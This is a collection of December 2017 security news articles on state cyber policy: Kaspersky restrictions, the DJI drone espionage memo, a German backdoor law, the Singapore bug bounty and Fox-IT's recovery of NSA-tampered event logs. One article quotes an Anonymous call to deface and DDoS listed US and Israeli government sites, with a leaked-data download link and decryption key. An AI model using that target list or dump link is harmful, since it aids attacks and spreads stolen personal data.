Kaspersky has repeatedly denied the accusations and it recently announced the launch of a transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

UPDATE. Kaspersky Lab has provided the following statement:

“Kaspersky Lab continues to have serious concerns about Section 1634 of the National Defense Authorization Act due to its geographic-specific approach to cybersecurity, singling out Kaspersky Lab, which we maintain, does little to mitigate information security risks affecting government networks. Nevertheless, Kaspersky Lab is assessing its options, while continuing to protect its customers from cyber threats, and collaborating globally with the IT security community to fight cybercrime.”


Singapore Ministry of Defence Announces Bug Bounty Program
13.12.2017 securityweek BigBrothers
Singapore’s Ministry of Defence (MINDEF) has invited roughly 300 white hat hackers from around the world to take part in a two-week bug bounty program targeting eight of its Internet-facing systems.

The MINDEF Bug Bounty Programme, scheduled to run between January 15 and February 4, 2018 is powered by the HackerOne platform.

The initiative covers the Defence Ministry’s public website, its I-Net and email services, the Central Manpower Base site, the Defence Science and Technology Agency site, and the NS, eHealth, LearNet 2 and myOASIS portals. Some of the targeted systems belong to the Singapore Armed Forces (SAF).

Rewards will range between S$150 (USD110) and roughly S$20,000 (USD15,000), and the total amount paid out will depend on the number and quality of bug reports. However, the cost of running the bug bounty program is expected to be less than what a commercial cybersecurity company would charge for an assessment, the Ministry said.

“Singapore is constantly exposed to the increasing risk of cyberattacks, and MINDEF is an attractive target for malicious cyber activity,” MINDEF said. “It is not possible to fully secure modern day computer software systems, and new vulnerabilities are discovered every day. As hackers with malicious intent find new methods to breach networks, MINDEF must constantly evolve and improve its defences against cyber threats.”

The announcement comes just months after the Ministry admitted that hackers had managed to breach a military system that stored non-classified data and personal information on servicemen and employees.

Singapore announced last year its intention to block Internet access on government computers for security reasons, but officials later clarified that the goal was to segregate sensitive systems from other online activities.

Singapore is the home city for SecurityWeek’s 2018 Singapore ICS Cyber Security Conference, an event dedicated to serving critical infrastructure and industrial internet stakeholders in the APAC region. The conference will take place April 24-26, 2018 at the Fairmont Singapore.


Event Logs Manipulated With NSA Hacking Tool Recoverable
12.12.2017 securityweek BigBrothers
Researchers at security firm Fox-IT have developed a tool that allows investigators to detect the use of specific NSA-linked malware and recover event log data it may have deleted from a machine.

The group calling itself Shadow Brokers has published several tools and exploits stolen from the Equation Group, cyberspies believed to be working for the U.S. National Security Agency (NSA). One of the tools leaked by the Shadow Brokers in April is DanderSpritz, a post-exploitation framework that allows hackers to harvest data, bypass and disable security systems, and move laterally within a compromised network.

An interesting DanderSpritz plugin is EventLogEdit, which is designed for manipulating Windows Event Log files to help attackers cover their tracks. While hacker tools that modify event logs are not unheard of, EventLogEdit is more sophisticated compared to others as it allows removal of individual entries from the Security, Application and System logs without leaving any obvious clues that the files had been edited.

“While we understand that event logs can be cleared and event logging stopped, surgically editing event logs is usually considered to be a very advanced capability (if possible at all),” Jake Williams, founder of Rendition Infosec and an expert in Shadow Broker leaks, said after news of the tool emerged. “Knowing that some attackers apparently have the ability to edit event logs can be a game changer for an investigation.”

Since the tool has been made public by the Shadow Brokers, it gives less sophisticated actors the opportunity to cover their tracks and hamper forensic investigations.

Fortunately, Fox-IT researchers have found a way to determine if EventLogEdit has been used on a system, and even recover the event log entries that it removed.

“When eventlogedit is used, the to-be-removed event record itself isn’t edited or removed at all: the record is only unreferenced. This is achieved by manipulation of the record header of the preceding record. Eventlogedit adds the size of the to-be-removed-record to the size of the previous record, thereby merging the two records. The removed record including its record header is now simply seen as excess data of the preceding record,” researchers explained. “You might think that an event viewer would show this excess or garbage data, but no. Apparently, all tested viewers parse the record binXml message data until the first end-tag and then move on to the next record.”

Experts pointed out that the removed records should be seen by organizations that send logs on the fly to a central server, but sophisticated attackers are likely to hijack that machine as well in an effort to hide their activities.

However, since the EventLogEdit tool leaves the removed record and record header in their original state, full recovery of the data is possible.

Fox-IT has released an open source Python script that identifies and exports removed event log records, allowing organizations to check if they have been targeted by the NSA or other threat actor that may be leveraging EventLogEdit. Users who don’t want to bother with compiling the code themselves can download a version of the tool provided as a Windows executable.


#OpUSA – OpIsrael – Anonymous hit Israel and threatens cyberattack on US Govt
9.12.2017 securityaffairs BigBrothers

#OpUSA – OpIsrael – The hacker collective Anonymous threatens cyber attacks on US Government and launched the offensive against the Israeli targets.
In the last hours, the hacktivists leaked online names, emails, and passwords of Israeli public employees and shared a list of US government sites to target, calling on action against them.

Anonymous leaked data belonging to only a handful of the sites, this is the retaliation of the collective against the US Government for its politics in the Middle East.

Anonymous operation aims to protect Palestine and protest against Donald Trump’s choice to recognize Jerusalem as the capital of Israel.

Below the message published on the blog of the website cyberguerilla.com:

“Anonymous OpUSA – OpIsrael: Israeli Gov’t hacked and dumped. Download link!

This Hack is part of the Operation US + Israel. #OpUSA – OpIsrael

The end of 2017 #Anonymous

Operation: https://pastebin.com/tgbkCQ61

Israel Gov’t hacked and dumped.

Download dump: https://mega.nz/#!ZWByDAbT

Decryption Key: !-Yvx4-wlzWEV5gagusHKcDF4eYeABfJxgDh_foO-D20

“Government of Israel and United State, our patience is exhausted!
No more words! Now only acts.
Anonymous can’t be silent when we see your actions.
Now its Anonymous time.“
We Are Anonymous,
We Are Legion,
We do not forgive,
We do not forget
Government of USA and Israel,
Expect us.“
Anonymous is calling for action against websites included in the United State and Israel Government Target list, the collective is inviting its members to hit in any way (i.e. Data Dump, Government Breach, Defacing, DDoSing ) these sites:

https://www.usa.gov/ = USA
https://www.gov.il/ = Israel
https://www.state.gov/ = USA
http://www.president.gov.il/ = Israel
https://www.whitehouse.gov/ = USA
http://itrade.gov.il/ = Israel
https://www.ssa.gov/ = USA
http://www.investinisrael.gov.il/ = Israel
https://www.data.gov/ = USA
http://www.antitrust.gov.il/ = Israel
https://www.irs.gov/ = USA
http://www.boi.org.il/en/ = Israel
https://www.federalreserve.gov/ = USA
http://www.space.gov.il/ = Israel
https://www.shabak.gov.il/ = Israel
The hackers aim to spread the #OpUSA and #OpIsrael by defacing any .us and .il domains, it is using the hashtags #OpUSA, #OpIsrael and #FreedomInWorld to make easy for sympathizers to see all the Anonymous posts on social media.

OpIsrael

Anonymous shared the code for the main deface page for OpUSA – OpIsrael here: https://ghostbin.com/paste/o3o88

Anonymous OpIsrael Israeli-US-hacking-2

Anonymous OpIsrael Israeli-US-hacking-2

The dump leaked by Anonymous is circulating online, it is a huge trove of data apparently containing the names and email addresses of government employees and alleged Mossad agents.

More news about the campaign is expected to be published on the Cyberguerrilla website.


The Indian Intelligence warns China is spying through 42 mobile apps
8.12.2017 securityaffairs BigBrothers

The Indian Intelligence warns China is spying its troops through 42 mobile apps, for this reason, the Intelligence Bureau asked soldiers to delete them.
The Indian Intelligence Bureau (IB) has warned that Chinese cyber spies are collecting confidential information about the Indian security installations through its popular mobile phone apps and devices.

The Intelligence Bureau issued an advisory to the troops posted at the international border.

Indian Intelligence Bureau
Many Indian cybersecurity experts have raised concerns about the possible espionage attempts by the Chinese military intelligence agencies.

“According to reports, the advisory issued by the DIG (Intelligence) has directed the troops posted along the Line of Actual Control (LAC) to either delete a number of mobile applications from their smartphones or reformat the devices altogether to guard against online espionage attempts from across the border.” reported the website Zeenews.india.com.

The advisory includes a list of about 42 popular Chinese mobile apps, including WeChat, Truecaller, Weibo, UC Browser and UC News, that according to the Indian intelligence pose a serious threat to the security of the state.

The Indian intelligence suspect that these apps transmitting sensitive personal data to the Chinese Government.

The fresh advisory was issued while the troops from both sides continue to maintain high alertness levels along the LAC.

The intelligence agencies regularly warn the armed forces to avoid using Chinese apps to avoid the leakage of confidential information to a hostile state like China.

The IAF, for example, suggested its staff and their families to avoid using Chinese Xiaomi smartphones.

“The Army, as well as the central armed police forces like the Indo-Tibetan Border Police, are deployed along the 4,057km LAC, which stretches from Ladakh to Arunachal Pradesh.” continues the Zee Media Bureau.

“The IAF, for instance, had earlier asked all its officers and airmen as well as their families to avoid using Chinese Xiaomi smartphones and notebooks on the ground that they could transfer user data to remote servers located in China.”

The warning from IB is related to Chinese mobile apps for both Android and IoS OSs.


Senate Confirms New US Homeland Security Chief
6.12.2017 securityweek BigBrothers   
The US Senate confirmed White House deputy chief of staff Kirstjen Nielsen as Secretary of Homeland Security on Tuesday, putting her in charge of implementing the Trump administration's immigration crackdown.

Nielsen is close to White House Chief of Staff John Kelly, who was President Donald Trump's first secretary at the Department of Homeland Security before he was brought in to discipline Trump's chaotic office at the end of July.

Nielsen, 45, is a lawyer and veteran of the national security sector. She served in the transportation security unit of DHS during the George W. Bush administration, and was also Bush's homeland security advisor in the White House.

Senate confirms Kirstjen Nielsen as US Homeland Security chief

Later she ran her own security advisory firm, Sunesis Consulting.

Known for expertise in cyber issues, she was named Kelly's chief of staff when he took over DHS at the beginning of the Trump administration, and then followed him to the White House.

Described as tough and no-nonsense, she nevertheless lacks the experience of running a massive organization like the 240,000-strong DHS.

The agency oversees a wide range of security issues, from immigration, to cyber, terror threats and disaster relief.

The Senate approved her nomination 62-37.

Her confirmation came on a day when DHS reclaimed substantial success in slowing illegal immigration across the southern border and arresting and deporting criminal aliens.

DHS said arrests of illegal immigrants were up 40 percent in the first nine months of the Trump administration, while border crossings plummeted based on tougher enforcement.

Trump has also ordered DHS to build a wall along the southern border.

But both Kelly and Nielsen have said that a wall on the entire 2,000 mile (3,200 kilometer) frontier with Mexico would be inappropriate, and that other measures, including electronic monitoring, would be required as well.


Is Your DJI Drone a Chinese Spy? Leaked DHS Memo Suggests
5.12.2017 thehackernews  BigBrothers

The United States Department of Homeland Security (DHS) has recently accused Da-Jiang Innovations (DJI), one of the largest drone manufacturers, of sending sensitive information about U.S. infrastructure to China through its commercial drones and software.
A copy memo from the Los Angeles office of the Immigration and Customs Enforcement bureau (ICE) has begun circulating online more recently, alleging "with moderate confidence" that DJI drones may be sending US critical infrastructure and law enforcement data back to China.
However, the bureau accessed "with high confidence" that this critical data collected by the DJI systems could then be used by the Chinese government to conduct physical or cyber attacks against the U.S. critical infrastructure and its population.
The memo goes on to specify the targets the Chinese Government has been attempting to spy on, which includes rail systems, water systems, hazardous material storage facilities, and construction of highways, bridges, and rails.
The memo, marked as "unclassified/law enforcement sensitive," was dated back to August this year, but was recently published by the Public Intelligence project.
In its memo, ICE cited what it called a reliable source in the drone industry "with first and secondhand access," but did not identify it, specifying that the concern is over DJI drones used by companies and institutions, not the ones flown by hobbyists in the U.S. and elsewhere.
According to ICE, the DJI drones operate on two Android smartphone apps—DJI GO and Sky Pixels—that automatically tag GPS imagery and locations, access users' phone data, and register facial recognition data even when the system is off.
Beside this, ICE says the apps also capture users identification and personal information, like their full names, email addresses, phone numbers, computer credentials, images, and videos.
"Much of the information collected includes proprietary and sensitive critical infrastructure data, such as detailed imagery of power control panels, security measures for critical infrastructure sites, or materials used in bridge construction," the ICE memo reads.
Citing an unnamed source, ICE alleged that DJI then automatically uploads this collected information to its cloud storage systems located in China, Taiwan, and Hong Kong, which the Chinese government most likely has access to.
Drone Maker Denies Sending Data to Chinese Government
Of course, the drone-maker has denied the allegations, saying that the memo from the US government office was based on "clearly false and misleading claims."
"The allegations in the bulletin are so profoundly wrong as a factual matter that ICE should consider withdrawing it, or at least correcting its unsupportable assertions," DJI said in a statement, cited by The New York Times.
According to a DJI spokesman, users have complete control over how much data they can share with the Chinese drone maker, and the automatic function offered by the DJI apps to store user flight logs can also be turned off.
Moreover, the DJI has recently added a new feature that allows pilots to cut off all outside internet connections while the drone is flying.
According to drone research firm Skylogic Research, DJI dominates the overall drone market with an almost two-thirds share in the United States and Canada. Not just hobbyists, but DJI drones are also used by commercial customers like contractors, police and realtors.
The accusation that DJI is facing is similar to the one faced by Kaspersky Labs for spying on its users and sending the stolen data back to the Russian government.
The DHS has also banned Kaspersky antivirus products in US government agencies over Russian spying fears without actually having any substantial evidence. The company has always denied any direct involvement with the Russian spies in the alleged incident.


German Government prepares Law for backdoors and hacking back
5.12.2017 securityaffairs  BigBrothers

The German Government is preparing a law that will force hardware vendors to include a backdoor in their products and to allow its unit to hack back.
The German Government is preparing a law that will force hardware vendors to include a backdoor in their products. The law aims to allow law enforcement agencies to use backdoors to gather information during their investigations.

The law would target devices in any industry, including telecommunications, automotive and IoT products.

According to local news outlet RedaktionsNetzwerk Deutschland (RND), German Officials are expected to submit their proposal for debate this week.

“The acting Federal Minister of the Interior Thomas de Maizière (CDU) wants to oblige the industry, German security authorities to open digital gateway for the spying on private cars, computers and smart TVs.” states the news outlet.

“The application is overwritten with “Need for action on the legal obligation of third parties for measures of covert information gathering according to §§ 100c and 100f StPO”. De Maizière wants to drastically expand the so-called eavesdropping attack by “using technical means against individuals”. Above all, large corporations and producers of digital security systems should be required to provide information and notification.”

The proposal is strongly supported by the Federal Minister of the Interior Thomas de Maizière who cites the difficulty investigations have had in the past especially when fighting against terrorist organizations.

German Government prepars Law for backdoors and hacking back

The Interior Minister explained that modern technology is able to alert suspects for every suspicious activity conducted by law enforcement agencies.

The Minister cited the cases of smart cars that alert an owner as soon as the car is shaken or any other anomalous activity is conducted by police officers.

Well the presence of a backdoor could allow investigators to operate stopping any warning is sent to the suspect.

De Maizière stressed out that companies have a “legal obligation” to introduce backdoors for the use of law enforcement agencies.

The Minister aims to oblige hardware manufacturer to disclose their “programming protocols” for analysis of Government experts and consequently to force companies to disclose details about their encrypted communication practices.

“Accordingly, eavesdropping would in future be possible wherever devices are connected to the Internet. The industry should give the state exclusive access rights, such as private tablets and computers, smart TVs or digitized kitchen appliances. A precondition for all measures of the extended wiretapping attack, however, would remain a judicial decision.” continues the news outlet.

One of the most disturbing aspects of the new law is that it would give German officials powers to hack back any remote computer that is suspected to be involved in attacks against the country infrastructure.

Something similar was discussed by the French Defense Minister Le Drian comments in January 2017 and by the US authorities, in both cases, the Government officials were referencing the cyber attacks conducted by the Russian intelligence.

The Minister says this is important to “shut down private computers in the event of a crisis,” such as is the case with botnet takedowns.

“De Maizière also wants an authorization for the security authorities to shut down private computers in the event of a crisis. An “Botnet takedown specialist concept” will allow security authorities to use private data to alert end users in good time if hackers want to misuse their computers for criminal purposes. In the event that online providers refuse to cooperate, far-reaching penalties are provided for.” continues the RedaktionsNetzwerk Deutschland.

Privacy advocates believe the German law could open the door to a mass surveillance programs, Government officials will have full powers of snooping everyone’s online communications.

The German authorities refused such kind of accusations and highlighted that any access to data gathered under these surveillance programs would be allowed only after law enforcement have obtained a court order.

The reality is that the presence of backdoor dramatically reduces the overall security of any system, the backdoors could be discovered and used by malicious actors such as a foreign government and a criminal syndicate with unpredictable consequences.


DJI drones may be sending data about U.S. critical infrastructure and law enforcement to China
5.12.2017 securityaffairs  BigBrothers

The US DHS has accused the Chinese Da-Jiang Innovations (DJI) of cyber espionage on U.S. critical infrastructure and law enforcement.
The US Department of Homeland Security (DHS) has recently accused the Chinese Da-Jiang Innovations (DJI), one of the largest drone manufacturers, of sending sensitive information about U.S. critical infrastructure and law enforcement to China.

A copy memo from the Los Angeles office of the Immigration and Customs Enforcement bureau (ICE) was published recently by the Public Intelligence project. The copy was marked as “unclassified / law enforcement sensitive, it alleges “with moderate confidence” that DJI drones were used by the Chinese Government as spying tools.

The authors of the memo provide several examples of law enforcement and critical infrastructure organizations using the DJI drones.

The situation is worrisome because data gathered by the DJI could be used by the Chinese government to conduct physical or cyber attacks against the US critical infrastructure (i.e. rail systems, water systems, hazardous material storage facilities, and construction of highways, bridges, and rails).

DIJ drones

The concern is related only to DJI drones used by companies and government organizations, not the unmanned vehicles used by hobbyists.

“It is based on information derived from open source reporting and a reliable source within the unmanned aerial systems (UAS) industry with first and secondhand access. The date of information is 9 August 2017.” reads the intelligence bulletin.
“(U//LES) SIP Los Angeles assesses with moderate confidence that Chinese-based company DJI Science and Technology is providing U.S. critical infrastructure and law enforcement data to the Chinese government. SIP Los Angeles further assesses with high confidence the company is selectively targeting government and privately owned entities within these sectors to expand its ability to collect and exploit sensitive U.S. data.”

According to the ICE, the DJI drones operate on two Android smartphone applications called DJI GO and Sky Pixels that automatically tag GPS imagery and locations, register facial recognition data even when the system is off, and access smartphone data.

The ICE revealed the mobile apps also gather user’s identification and personal information, including full names, email addresses, phone numbers, computer credentials, images, and videos.

“Additionally, the applications capture user identification, e-mail addresses, full names, phone numbers, images, videos, and computer credentials. Much of the information collected includes proprietary and sensitive critical infrastructure data, such as detailed imagery of power control panels, security measures for critical infrastructure sites, or materials used in bridge construction.” the ICE memo reads.

“According to the source of information (SOI), DJI automatically uploads this information into cloud storage systems located in Taiwan, China, and Hong Kong, to which the Chinese government most likely has access. SIP Los Angeles assesses with high confidence a foreign government with access to this information could easily coordinate physical or cyber attacks against critical sites.”

The Chinese drone manufacturer denied the allegations, in a statement, the company said the report was “based on clearly false and misleading claims.”

“The allegations in the bulletin are so profoundly wrong as a factual matter that ICE should consider withdrawing it, or at least correcting its unsupportable assertions,” DJI said in a statement, cited by The New York Times.

According to a DJI spokesman, users can properly configure their drones to control over how much data they can share with the Chinese drone manufactures.

“DJI does strive to comply with local laws and regulations in each country where its drones operate and to facilitate compliance by our customers. To the extent that there are location-specific rules and policies within China, we ensure that our systems comply with these rules, including the need to register or include no-fly zones on board,” DJI stated.

“In compliance with the Chinese regulation, DJI utilizes the user’s IP address, GPS location, and MCC ID to determine if a drone is being operated in China. If so, DJI provides the customer with the features necessary to comply with Chinese regulations and policies. Otherwise, DJI provides no information about or data collected by the drone to the Chinese government,”

Moreover, the DJI has recently implemented a new feature that allows pilots to cut off all outside internet connections while the drone is flying.


UK Members of Parliament Share Passwords with Staff
5.12.2017 securityweek BigBrothers
UK member of parliament (MP) Nadine Dorries has declared on Twitter that she shares the password to her work computer with staff 'including interns'.

The immediate purpose of the statement was to lend political support to under-fire First Secretary of State Damian Green. Green was accused by a former Metropolitan Police assistant commissioner of accessing porn on his work computer following a 2008 police raid investigating Home Office leaks. Dorries' tweet includes the statement, "For the officer on @BBCNews just now to claim that the computer on Greens desk was accessed and therefore it was Green is utterly preposterous!!"

But in supporting her colleague, she might have stirred a bigger scandal than that concerning Green: MPs' attitude towards passwords. Several other MPs have agreed with and supported Dorries' position.

The Dorries' Green defense is common in both politics and international cyber relations: plausible deniability through the difficulty of attribution. If multiple people can be guilty of an act, you cannot easily prove which one is the guilty party. And if multiple people have access to the password, it's hard to prove who did what with the computer.

In security, however, the fourth criterion after confidentiality, integrity and availability (CIA) is often defined as accountability. It is clear that any MP that shares his or her password is automatically failing to maintain, or specifically obfuscating, accountability. In reality, they are also guilty of ignoring official policy. The House of Commons Staff Handbook (section 5.8) says, "You MUST NOT... share your password."

The UK's National Cyber Security Center (NCSC) Password Guidance, updated in August 2016, also states, "You should never allow password sharing between users. Sharing accounts, or even occasional use by anyone other than the account holder, negates the benefit of authenticating a specific user. In particular, the ability to audit and monitor a specific user's actions is lost."

However, the sharing of MPs' passwords may go beyond simply ignoring advice and/or policy. Although sharing passwords is not in itself a breach of the UK's Data Protection Act, it could lead to a breach. The UK's data protection regulator, the ICO, itself tweeted, "We're aware of reports that MPs share logins and passwords and are making enquiries of the relevant parliamentary authorities. We would remind MPs and others of their obligations under the Data Protection Act to keep personal data secure."

It is questionable whether giving interns access to the potentially sensitive personal information of constituents is within the spirit if not letter of the current law. It is also concerning that Britain's lawmakers should have such a lax attitude towards security at a time when its intelligence agencies are increasingly warning about Russia targeting the UK government.

Security researcher Troy Hunt suggests, without condoning, that this is an example of users bypassing policy in order to work more efficiently. "Her approach to password sharing may simply be evidence of humans working around technology constraints." This is common in all organizations -- and is generally countered by security awareness training supported by technological controls.

The need to share data among several different people is not uncommon -- and there are numerous technology solutions that could be employed. These include delegated access, shared access to collaboration tools (where the MP's staff would have password-controlled access to the documents rather than to the MP's computer), or even Microsoft's SharePoint.

The most worrying aspect to MPs and their password sharing is their common belief that there is nothing wrong in this. This in turn suggests that MPs do not receive adequate security awareness training and/or that parliament's IT department isn't offering sufficient options to make this unnecessary -- or controls to make it impossible. In most private enterprises,sharing passwords would be considered a disciplinary offense.


UK National Cyber Security Centre (NCSC)’s letter warns against software made in hostile states, specifically Russia
4.12.2017 securityaffairs  BigBrothers

The UK National Cyber Security Centre (NCSC) warns of supply chain risk in cloud-based products, including antivirus (AV) software developed by Russia.
We have a long debated the ban of the Russian security software from US Government offices, now part of the UK intelligence is adopting the same strategy.

Last week the CEO of the UK National Cyber Security Centre (NCSC), Ciaran Martin, wrote to permanent secretaries regarding the issue of supply chain risk in cloud-based products, including anti-virus (AV) software.

The NCSC is a branch of the UK Government Communications Headquarters (GCHQ), the UK intelligence and security agency.

The letter warns against software made in hostile states, specifically Russia, as the Prime Minister’s Guildhall speech set out, the Government of Moscow is acting against the UK’s national interest in cyberspace.

The Letter provides an advice to the Government agencies and offices, but isn’t a ban for specific solutions.

The letter highlights the intrusive nature of antivirus software that is necessary to detect malicious code, it is important to remain vigilant to the risk that AV products developed by a hostile actor could person a wide range of malicious activities.

“The job of AV is to detect malware in a network and get rid of it. So to do its job properly, an AV product must (a) be highly intrusive within a network so it can find malware, and (b) be able to communicate back to the vendor so it knows what it is looking for and what needs to be done to defeat the infiltration. It is therefore obvious why this matters in terms of national security. We need to be vigilant to the risk that an AV product under the control of a hostile actor could extract sensitive data from that network, or indeed cause damage to the network itself.” reads the letter.

“That’s why the country of origin matters. It isn’t everything, and nor is it a simple matter of flags – there are Western companies who have non-Western contributors to their supply chain, including from hostile states. But in the national security space there are some obvious risks around foreign ownership.”

“The specific country we are highlighting in this package of guidance is Russia.”

The official warns of the risk of exposure of classified information to the Russian state that would be a risk to national security, for this reason a Russia-based AV company should not be chosen. It is an obvious reference to the Kaspersky case.

NCSC letter

The Letter suggests banning the software developed by Russia-based companies from any system processing information classified SECRET and above.

“To that end, we advise that where it is assessed that access to the information by the Russian state would be a risk to national security, a Russia-based AV company should not be chosen. In practical terms, this means that for systems processing information classified SECRET and above, a Russia-based provider should never be used.” continues the Letter.

“This will also apply to some Official tier systems as well, for a small number of departments which deal extensively with national security and related matters of foreign policy, international negotiations, defence and other sensitive information.”

Martin confirmed that the NCSC is currently discussing with Kaspersky Lab about whether the UK Government can develop a framework that can be independently verified giving the Government assurance about the security of the involvement of the Russian firm in the wider UK market.

“In particular we are seeking verifiable measures to prevent the transfer of UK data to the Russian state. We will be transparent about the outcome of those discussions with Kaspersky Lab and we will adjust our guidance if necessary in the light of any conclusions.” continues the Letter.

In response to the current situation, Kaspersky launched the Transparency Initiative in late October that allows government agencies to review the its security software for backdoors.


UK Warns Against Gov Use of Russia-based AV Companies
4.12.2017 securityweek BigBrothers
UK NCSC Chief Warns of Supply Chain Risk from Anti-Virus (AV) Software Products

The UK's National Cyber Security Center (NCSC) has warned against the use of UK government and government agencies using Kaspersky Lab products. The ban is not as forthright or as explicit as September's DHS ban on U.S. government agencies using Kaspersky; but it will, for the time being at least, have a similar effect in the UK.

On Friday, NCSC chief Ciaran Martin wrote to permanent secretaries (the most senior civil servants in a UK government ministry) warning about the issue of supply chain risk in cloud-based products. In this sense it is a general warning that all security officers would do well to heed. The NCSC is not a regulator and cannot insist -- but its guidance will undoubtedly be observed.

The warning focuses on Russia and explicitly calls out Kaspersky Lab.

"The NCSC advises that Russia is a highly capable cyber threat actor which uses cyber as a tool of statecraft. This includes espionage, disruption and influence operations. Russia has the intent to target UK central Government and the UK's critical national infrastructure," Martin wrote. "However," adds the letter, "the overwhelming majority of UK individuals and organisations are not being actively targeted by the Russian state, and are far more likely to be targeted by cyber criminals."

The unstated implication is that consumers can carry on using Kaspersky Lab, but that government -- or indeed any organization that processes information classified SECRET and above -- should never use a Russia-based AV provider. This idea is expanded in an associated blog post from Ian Levy, the NCSC technical director. He comments, "We see no compelling case at present to extend that advice to wider public sector, more general enterprises, or individuals." In fact, he goes further: "We really don't want people doing things like ripping out Kaspersky software at large, as it makes little sense."

However, there is also a silver lining for Kaspersky Lab in this warning. Kaspersky is specifically named only twice towards the end of the letter to the permanent secretaries. Firstly, the letter states that the NCSC is in discussion with the Russian firm "about whether we can develop a framework that we and others can independently verify, which would give the Government assurance about the security of their involvement in the wider UK market." Secondly, the letter adds that the NCSC will be transparent about the outcome of these discussions, and "will adjust our guidance if necessary in the light of any conclusions."

This is an approach that Kaspersky Lab has already offered to the U.S. government. In July 2017 Kaspersky Lab offered to give its source code to the U.S. government for analysis. "Anything I can do to prove that we don't behave maliciously I will do it," said CEO Eugene Kaspersky. There is precedent for such code review in the UK. In October, Kaspersky launched a Global Transparency Initiative whose goal is to help the company clear its name following the reports about its inappropriate ties to the Russian government.

Chinese firm Huawei's network products are effectively banned in the U.S. over fears that they could contain backdoors capable of leaking sensitive information back to China. These products are not banned in the UK -- largely down to the operations of a building, commonly known as The Cell, in the market town of Banbury. Here the NCSC has oversight of Huawei source code, and engineers reverse engineer the code looking for flaws and backdoors. Huawei has been given a green light in the UK.

If Kaspersky Lab and the NCSC can come to a similar arrangement with the anti-virus code, then a UK accommodation with Kaspersky Lab might be possible. Eugene Kaspersky is optimistic, tweeting on Saturday, "Let me stress: there is *no* ban for KL products in the UK. We are in touch with @NCSC regarding our Transparency Initiative and I am sure we will find the way to work together."

It will not be easy. Analyzing firmware in a hardware product is easier than analyzing the flow of traffic into and through the cloud; and it is noticeable that the NCSC's primary concern is "the issue of supply chain risk in cloud-based products."

"By definition," explains cyber security researcher and consultant Stewart Twyneham, "anti-virus software needs to have total access to a computer in order to prevent infection -- and modern quarantine mechanisms will often upload suspect viruses to the cloud so that researchers can learn more. This is alleged to have happened in the case of Nghia Hoang Pho back in 2015 -- who copied secret NSA security exploits onto his home computer, which was running Kaspersky's anti-virus."

Pho was charged and pleaded guilty late last week to removing and retaining top-secret documents from his employer, the NSA. The suggestion is that Russian intelligence learned of the presence of this data through automatic uploads of suspect malicious files to Kaspersky's cloud, and then hacked into Pho's computer. How Russian intelligence learned of the NSA files is what is unknown and is the cause for concern. But since this sort of knowledge cannot come from a code review, the possibility even if not the probability of a clandestine relationship between Kaspersky Lab and Russian intelligence can never be proven one way or the other.

If a Kaspersky Lab code review by NCSC finds no back doors or flaws in the software, it is still unlikely to change NCSC guidance over top secret documents. However, since there will be little interest from Russian intelligence in standard consumer computers, it could lead to a tacit acceptance guide for any user outside of government. Further, since the NCSC has promised to be transparent in any findings, that tacit acceptance could be interpreted as explicit acceptance for all users outside of government.

In March of this year, the NCSC warned about "the potential for hostile action against the UK political system." Without confirming that the main threat is from Russia, the letter makes it clear that the primary threat is considered to be that country.


DHS Says Drone Maker DJI Helping China Spy on U.S.
4.12.2017 securityweek BigBrothers
A memo from the U.S. Department of Homeland Security (DHS) warns that China-based Da-Jiang Innovations (DJI), one of the world’s largest drone manufacturers, has been providing information on critical infrastructure and law enforcement to the Chinese government.

The Los Angeles office of Immigrations and Customs Enforcement (ICE), specifically its Special Agent in Charge Intelligence Program (SIP), issued an intelligence bulletin back in August claiming that DJI is helping China spy on the United States.

A copy of the memo, marked “unclassified / law enforcement sensitive,” was published recently by the Public Intelligence project. The document, based on information from open source reporting and a “reliable source” in the unmanned aerial systems industry, assesses with moderate confidence that DJI is providing data on U.S. critical infrastructure and law enforcement to the Chinese government. The authors of the memo provide several examples of law enforcement and critical infrastructure organizations using DJI drones.

The agency also assesses with high confidence that the company is targeting government and private entities in these sectors in an effort to “expand its ability to collect and exploit sensitive U.S. data.”DJI using drones to help China spy on US

ICE claims two of the Android applications provided by DJI for some of its drones automatically tag GPS imagery and location, register facial recognition data even when turned off, and access data in the user’s phone. The data, which the agency claims to include personal information and other sensitive data, such as power control panels and security measures for critical infrastructure sites, is allegedly stored on cloud servers to which the Chinese government “likely has access.”

“SIP Los Angeles assesses with high confidence the critical infrastructure and law enforcement entities using DJI systems are collecting sensitive intelligence that the Chinese government could use to conduct physical or cyber attacks against the United States and its population,” the memo reads. “Alternatively, China could provide DJI information to terrorist organizations, hostile non-state entities, or state-sponsored groups to coordinate attacks against U.S. critical infrastructure.”

The intelligence bulletin also points to a recent memo of the U.S. Army, which instructs units to stop using DJI drones due to cybersecurity vulnerabilities, and a U.S. Navy memo on the operational risks associated with the use of the Chinese firm’s products. DJI has taken some measures to improve privacy following the Army ban.

The ICE document also claims that DJI aggressively dropped drone prices in 2015 to force its main competitors out of the market.

“The bulletin is based on clearly false and misleading claims from an unidentified source,” DJI said in response to the ICE memo. “Several of the key claims made by this unnamed source show a fundamental lack of understanding of DJI, its technology and the drone market.”

The company claims its products are not capable of recognizing a person’s face for identification purposes – a feature exists for tracking the movement of the shape of a person or the shape of their face in order to control the drone, but DJI claims it only works when the system is powered on and the Active Track mode is enabled.

DJI also refutes claims that its pricing strategy has caused competitors to stop production, and denies selling its products cheaper in the U.S. than in China.

“DJI does strive to comply with local laws and regulations in each country where its drones operate and to facilitate compliance by our customers. To the extent that there are location-specific rules and policies within China, we ensure that our systems comply with these rules, including the need to register or include no-fly zones on board,” DJI stated.

“In compliance with the Chinese regulation, DJI utilizes the user’s IP address, GPS location, and MCC ID to determine if a drone is being operated in China. If so, DJI provides the customer with the features necessary to comply with Chinese regulations and policies. Otherwise, DJI provides no information about or data collected by the drone to the Chinese government,” the company added.

DJI has also shared some more information regarding a recent incident involving a researcher who took part in the company’s bug bounty program. The expert had been offered $30,000 after finding some serious vulnerabilities, but he walked away from the deal due to an agreement DJI had asked him to sign.

The accusations brought against DJI are similar to the allegations that Kaspersky Lab is spying for the Russian government. Kaspersky’s products have been banned in U.S. government agencies by the DHS after several media reports on the topic. However, no evidence has been provided to back the claims.


Here's the NSA Employee Who Kept Top Secret Documents at Home
3.12.2017 thehackernews BigBrothers
A former employee—who worked for an elite hacking group operated by the U.S. National Security Agency—pleaded guilty on Friday to illegally taking classified documents home, which were later stolen by Russian hackers.
In a press release published Friday, the US Justice Department announced that Nghia Hoang Pho, a 67-year-old of Ellicott City, Maryland, took documents that contained top-secret national information from the agency between 2010 and 2015.
